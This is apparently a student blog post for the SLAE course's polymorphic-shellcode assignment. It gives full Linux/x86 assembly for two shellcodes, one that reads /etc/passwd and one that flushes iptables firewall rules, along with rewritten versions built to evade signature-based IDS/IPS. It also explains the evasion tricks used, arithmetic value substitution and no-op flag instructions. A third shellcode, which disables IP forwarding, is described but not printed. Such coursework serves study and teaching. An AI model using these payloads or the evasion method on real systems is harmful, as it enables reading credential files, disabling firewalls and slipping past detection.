SLAE Assignment 6 - Polymorphic Shellcodes
Objective
The objective of this assignment is to create polymorphic shellcodes of already existing and well known shellcodes . Polymorphism is a way to bypass signature based intrusion detection systems .
A polymorphic shellcode is created by modifying an already existing shellcode in an assembly level without changing its original functionalities .
Shellcode 1 : http://shell-storm.org/shellcode/files/shellcode-842.php
Original Author - Tiny Read File Shellcode - Geyslan G. Bem, Hacking bits
The first step was to obtain the assembly code from the shellcode . i used ndisasm to extract them .
As you can see from the above screenshot the original author used 3 system calls in his code . They were open , read and write . The open ( 5) system call was used to open the /etc/passwd file and then the read ( 3) system call was used to read upto 4096 bytes from the passwd file . Then the write (4) system call is called to print the file details to the screen .
My aim was to change the assembly code in a way that it is different from the above code so that a signature based IDS/ IPS should not catch the code even if the original signature is present in its database .
I made the following changes .
Original Shellcode
|
Polymorphic
Shellcode
|
xor ecx,ecx
mul ecx
mov al,0x5
push ecx
push dword 0x64777373
push dword 0x61702f63
push dword 0x74652f2f
mov ebx,esp
int 0x80
xchg eax,ebx
xchg eax,ecx
mov al,0x3
xor edx,edx
mov dx,0xfff
inc edx
int 0x80
xchg eax,edx
xor eax,eax
mov al,0x4
mov bl,0x1
int 0x80
xchg eax,ebx
int 0x80
|
xor
ecx,ecx
mul
ecx
stc
mov
al,0x4
inc
al
clc
push
ecx
mov
edx, 0x53666262
add
edx, 0x11111111
push
edx
push
dword 0x61702f63
xor
edx,edx
mov
edx, 0x85764040
sub
edx, 0x11111111
push
edx
mov
ebx,esp
int
0x80
xchg
eax,ebx
xchg
eax,ecx
mov
al,0x4
dec
al
xor
edx,edx
mov
dx,0xfff
inc
edx
int
0x80
xchg
eax,edx
xor
eax,eax
mov
al,0x4
mov
bl,0x1
int
0x80
xchg
eax,ebx
int 0x80
|
We have learned during the SLAE class that most of the assembly logic can be expressed in more than one form . I used many techniques learned in the course to express the code in a different format.The mainly used techniques were the following .
Using arithmetic logic to input same values in different ways ,
for eg push 0x33333333 can be also expressed as ,
mov ebx, 0x22222222
add ebx, 0x11111111
Adding random assembly code which doesn't have any impact ,
for eg the flags like STC - set carry flag and CLC - clear carry flags can be added to create randomness to the code , the carry flag will not have an impact during the execution of the current shellcode .
Execution
Now its time to execute the polymorphic code to see if its works . As usual we will compile and link the code and obtain the opcodes for the shellcode .
As you can see it was a success . The shellcode length was 73 which was less than our cutoff ( not more than 150% of original code)
Shellcode 2 : http://shell-storm.org/shellcode/files/shellcode-361.php
Original Author :
/rootteam/dev0id (www.sysworld.net) 58 bytes
jmp short callme
main:
pop esi
xor eax,eax
mov
byte [esi+14],al
mov
byte [esi+17],al
mov
long [esi+18],esi
lea
ebx,[esi+15]
mov
long [esi+22],ebx
mov
long [esi+26],eax
mov
al,0x0b
mov ebx,esi
lea ecx,[esi+18]
lea edx,[esi+26]
int 0x80
callme:
call main
db
'/sbin/iptables#-F#'
|
Shellcode usage : The above shellcode will flush the iptables firewall rules . IPtables is the default firewall present in linux OS and its pretty usefull .
I have modified the above nasm file to the following .
global _start
_start:
xor eax,eax
push eax
push dword 0x73656c62
push dword 0x61747069
push dword 0x2f6e6962
mov edx, 0x11111111
add edx, 0x621e1e1e
push edx
mov ebx, esp
push eax
push word 0x462d
mov esi, esp
push eax
push esi
push ebx
mov ecx,esp
mov edx,eax
mov al,0xa
inc al
int 0x80
|
Now we will execute the shellcode and see the outcome .
We can see that the shellcode executed successfully and the rules were flushed . The total shellcode length is 52 bytes which is less than the original 58 byte shellcode .
Shellcode 3 :http://shell-storm.org/shellcode/files/shellcode-848.php
Original Author - Hamid Zamani
Linux/x86 - Set '/proc/sys/net/ipv4/ip_forward' to '0' & exit() .Size : 83 Bytes.
See below the shellcode in intel format .
IP forwarding is done to forward packets from one interface to another , or in essence this is how router works .
Lets modify the shellcode .
i have done some changes and you can see the 2 shellcodes side by side .
|
|
Now lets execute the shellcode and see the output .
As you can clearly see from the above picture the value of the particular file is now changed to 0 from 1.
This blog post has been created
for completing the requirements of the SecurityTube Linux Assembly Expert
certification
Student ID: SLAE – 739